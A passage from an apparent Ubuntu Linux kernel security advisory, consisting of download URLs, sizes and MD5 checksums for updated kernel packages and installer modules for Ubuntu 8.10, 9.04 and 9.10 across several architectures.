28f8ea5f653057c350d40feb64d68f2d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_i386.deb\n      Size/MD5:   645340 a4d347f729beffbf9ff1701d21a5f9b2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_i386.deb\n      Size/MD5: 23499764 59f3275c547e9f13f97eba55955725f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_i386.deb\n      Size/MD5: 23635906 c096ba5db0db8b87f67309a9e9c6ff5f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_i386.deb\n      Size/MD5: 10117090 7e1648c7b3a3ab2606263ecb20683ba1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_i386.deb\n      Size/MD5:   675850 3e91710602fec2d4aebafe62a6cdfe80\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   433078 d1439530f50069f41b4c30b010871b4f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   171298 68b786d8853574467c792efe3fa62ca5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   264104 3a49c641e4a146fdb634b298c51ca6e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:  1994518 105c6b0fb8b650949da502f3fee2018d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   150964 dc4178cced6d9c1823d24b2204c15ae9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   184058 a25940b16b7022a52f7b8c78e164a908\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   157856 c628cef1c909819dab1fe2d812dffeba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    34500 2ea55d8e77aa3065af30ff4d440c059d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    78286 6d0f7704cdff848dbbfbd5fe60cf0ca7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    86190 c7d8ec25c3d35ea8455e9cf7c1b4ec64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    51332 79b56b5e7f79a17d45fb7c55f64954b3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:     8796 e571105caa3bed5fc3576928b03eff31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    64316 bcb0f12340567e9db7a5dcc3549dcf0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   102092 a2556a5171c52abe48ba423b008c6f13\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:  1450234 339572f5e579468fc438b1dd2cc2dcd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    44520 68267a8c684d01c673d4b41bf5d4af69\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    12642 80e228567fcb814cd67e54aec6abdb41\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   373158 483599df2e1b6c82a688b413b74e5b91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   189720 156d822da222b7fc8b887a4d1b3b7c31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    12992 7232aad22eb02ec694fa0d41d367a69c\n\nUpdated packages for Ubuntu 9.04:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.diff.gz\n      Size/MD5:  7350773 c09bf21927b9609694b39cdd55af21cf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.dsc\n      Size/MD5:     3198 5ba9f01bd70b951901d1d1667b964b54\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz\n      Size/MD5: 66766084 062c29b626a55f09a65532538a6184d4\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-18.59_all.deb\n      Size/MD5:  3636694 05fda32db7067b32c0fe593e1acf0533\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18_2.6.28-18.59_all.deb\n      Size/MD5:  8701396 65f8df38ba832ad50c6486d22420efca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-18.59_all.deb\n      Size/MD5: 56998214 3d33148ef29824c1060e1f66b470c6c4\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   234600 929bceffa24f85104c08edf073ac1f0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    44110 6d94c9d8ecfe3b4673d25cce1db2b95b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    43316 d895b0ad91a70c9381fd7e17650fab75\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    51116 da4c61dc01f5b5e8fb61cdf14bbbb40a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    90082 dad217572b5b07064b9e12b0062d16b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    38016 5e886058b306b4937f5a4ebe22451db6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   521628 d9f3ffe45b307847935002619ac31ea0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   125818 6fbc3c76a739b91e01da41bd535f3791\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    58060 cc30f23edae38f46b0d56f621969fd62\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   312502 9a11c9f0f37fee6a92c59de9df5fca11\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:  3872142 cdc4640244b192a5970dfc3d3efe4d7e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_amd64.deb\n      Size/MD5:   689228 bf7aedb2bbb365a73ed77a8976a2701e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_amd64.deb\n      Size/MD5:   689122 80cfc63043a2d7231f86ef3e68f0a131\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_amd64.deb\n      Size/MD5: 24344078 dca923a8044df0ba9c642d5f2b317867\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_amd64.deb\n      Size/MD5: 24335914 ad5a4fe70b4555e9399f9a45b58459f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_amd64.deb\n      Size/MD5: 10551276 b61ed90bb3d3f19f0d2e593c0e9f091a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_amd64.deb\n      Size/MD5:   766282 f86ee0c95591ea10b578e848b6fdeb5f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   215170 7939440a8813110d952d86b49113e146\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   189496 f7495840a58b11f4ebfaad4d8cf203fe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    29412 54845dbae313e98befcc172b5e87ac2c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   274480 e029f99b6550bd014f26c45997f76dcc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:  1933908 6fa450fb440effd7f4a1d643f5e80ab9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   163464 208a84b0506fcd9cadb25f1b7f9d26b7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   194828 596399bbfa9a92e3116c8f8d3a7d1391\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   152994 3cf4fb6614c5798cdcca7c8d7fd04a5b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    36486 b3cf4deb0dc4e11f095eb9bcf81546df\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:     5842 085134ad282a8b2580aa12a6ed64fd9e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    72152 5b6bf270db5279c7d79cbd5fca8e14f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    22714 a01ded50b855c5ed0580072a2277b74a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:     8874 f173072403f51e6e6da399debd91068f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    47442 e822623d7e4ae0bec0ea5094fed67dcf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    15656 2b2e6ad08af592fa3106adb4eb16324e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:  1273594 d873a895c58da3fcd5b8a0ea91f9a5ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    47204 c80f48bd49fddaae0188cf56350445f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    72706 dcc76877eef3af00d0280f96cafb6e45\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   126958 b184498c9d2a598d57e293bc09049cda\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    13472 1399e0100a81d92448659b83949a62a6\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   215860 fe00a3406a5496e200d5c4e5975469f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    46662 d7a61d1e363f9766795132d3325f02c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    41352 7d84e783cf7fc4111eaf964395440369\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    47402 2cd024da2955f7e35fe4519c8df5add5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    86924 515a3a07357e06f49b2e4384e2af7b8c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    33578 452adbbc84f5a5218610ddad25eb3ea0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   525752 1a2c59458472f4a18538df9386396703\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   125654 8678d7c3409daf24a373b4d11a0d9263\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    54874 94d4465b06d14b20af5803f2afddf53d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   301338 64a58b9a7ee5d53c2d1a486fe32deb93\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:  3746292 099947b9ddfb625da14b96bf1b9f59e6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_i386.deb\n      Size/MD5:   673824 c36739d12d66db8de4b6e270b1c91464\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_i386.deb\n      Size/MD5:   676398 c7091523d59d0b1cdd4453e12d5983d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_i386.deb\n      Size/MD5: 24662186 cfa5f52488fb3767debfefaf8940f6b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_i386.deb\n      Size/MD5: 24777004 b524e2b45df5e9d30ebc81717b5c62d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_i386.deb\n      Size/MD5: 10250016 09b9af49da34304c1dd280896ce9c0cd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_i386.deb\n      Size/MD5:   766288 4858bc3941dc0e545195c0b911142a4c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   218106 f4f03360ad8e2ee23a58b534e8a2c045\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   174922 fbc6643612c01e91066a87b6ec9c7125\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    30064 c8e4db00aa9c0c3b75c47c103d87b4c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   262814 794c683379e359de14db8806fe984f78\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:  2110070 da3e69dab278584e1abea5ee15d9b47d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   150230 7fc91b8ad535bfb705ba2cb2fc9ff57d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   184326 e505e555ac3bd0c33d00a47f7530f78c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   143584 209207f7e7887594a9d55d17bf1dca76\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    34576 cafc0f5f2db11f69d10e75815d3e9018\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:     5504 21cfbb5c1aa4c8d82bf3e1412646263f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    86018 0dc7720bee90887f4ebf5c71cf93d611\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    47636 fbebe71b83526192c08fd6d797ee8cb1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:     8714 14ed52e8c0a75151dd45acf3cb1ffc34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    44692 27502a17d5ca35cc31a9fd79ae7d2f1d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    14780 2c9ea91e8d8da2bff76c38a6cdce748d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:  1445966 33fa2ee03c566924552fc5b413e2ccf1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    44098 f740dcb377a692e2ff25a65424431e5b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    69290 a7e3130530005bf8fe4edabe8b003888\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   119528 a12c1a5bf9a112402d80e8f77ee87a1c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    12678 6646096dee2575f3bb33510e70bdd52b\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   215260 9a096eefa7f5e423c60fea41c314b9a5\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    46664 ba3b534d98d6717395ec66b402b3c701\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    40958 5950f34ca1fbd16f82a42020bc934ec6\n    http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    47312 0d7d48294720bbd387710d560756ce6a\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    86530 9e5c38cd42496250d5fcf951c6b5d4bd\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    33272 a8890faa31cf92122bcce2991374fe7e\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   523810 7b2a58ca4d024926c0f8101ab49242d6\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   125252 f48299cd45e2ef1a74017d1c7653976e\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    63568 135fe854fe31d2d8bd9cd09f40a266e5\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   300756 77668125ff976eaed45f3d2676a46c5f\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:  3035296 186cc64995c4fd4404241de5399eb0fb\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-18-lpia_2.6.28-18.59_lpia.deb\n      Size/MD5:   641460 1a4d29b73378acb8bcf88658f88dd08e\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-18-lpia_2.6.28-18.59_lpia.deb\n      Size/MD5: 21796372 d7455e818bf972ef7eb0fe54b7bd96dc\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_lpia.deb\n      Size/MD5:   766260 b67d9c1432185123449ed6826ed9588d\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   303982 80fe6dcf6d68a46047ef6ddc2c098614\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   157406 2cc8f76d83482452bb6073656a80b2ee\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    24442 28180da41edae2700e4c8a0e4f1c656f\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   260414 49a0b6bd418a0ff1d274ce8f602e2733\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:  2027576 241ee9a564502f3d8837806d5e6480d0\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   149398 b14f79b842c979418dec65e273836cd0\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   184736 a159624d12831598d35c3b00ba563182\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   143238 2720ae4f8cdad85066fc888e7fc3c796\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    34462 582363a3843fdbded2476793775ace76\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:     5496 67c7245d730a7b241eb9947afeef7669\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    85646 6a31ffe0054c27df1506ae34162ab79e\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    47402 ff41a000c4a3abbed18330e905a01b7b\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:     8718 15aa2d8fafced6b6e3b5a24c698b4089\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    63106 7a967940a04c1ee6a9626258e608b54c\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    14720 dc899d8630769d6270526c49f99a2af8\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:  1447832 400eeba1e83569d777954b21b6df593c\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    43898 16b0a1310e3f70dccfc8d0d5f971b064\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   155186 b22b41e37f88fe49531f5580e0f7f712\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   172666 df244ff125096be469b1c56a30f1e05f\n    http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:     8154 f2d765541e008431b4d3eae00f435b61\n\nUpdated packages for Ubuntu 9.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.dsc\n      Size/MD5:     2450 610bb83247876f8a8b47a0fd0d46fae8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.tar.gz\n      Size/MD5: 87052080 62b9dcb9ad24e659db1aa085f9e5a456\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.dsc\n      Size/MD5:     1906 a39c7ff46fb3ff74480d0e98366a486d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.tar.gz\n      Size/MD5: 81902928 c9e88b4f386710c3f22979986a7e3a34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.dsc\n      Size/MD5:     1943 25176b20de251c2e58bb95e2dd9c1c7b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.tar.gz\n      Size/MD5: 82470873 4d5238d3d11105852133d3eb802a95cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.diff.gz\n      Size/MD5:  2811600 b2b44f12a786758d470e6a29c09d0388\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.dsc\n      Size/MD5:     3782 ae6bf5844769d00004b919a6f61d588c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz\n      Size/MD5: 78278595 